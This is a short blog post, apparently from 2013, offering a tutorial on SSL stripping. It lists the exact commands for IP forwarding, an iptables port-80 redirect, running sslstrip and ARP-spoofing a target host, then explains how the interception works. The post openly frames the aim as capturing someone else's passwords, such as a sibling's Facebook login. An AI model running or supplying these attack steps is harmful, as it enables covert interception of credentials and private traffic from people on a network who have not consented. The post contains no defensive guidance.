Thursday, 14 November 2013

SSL STRIP - VIDEO TUTORIAL

SSL STRIP - VIDEO TUTORIAL




What is SSL Strip?

SSL strip is a software that is used to sniff the data over HTTPS. The sniffer read all the data in a network with 9is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your brother in other room). So here is a tools that can even intercept the data over HTTPS.


Running sslstrip

  • Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
  • Run sslstrip. (sslstrip.py -l <listenPort>)
  • Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.

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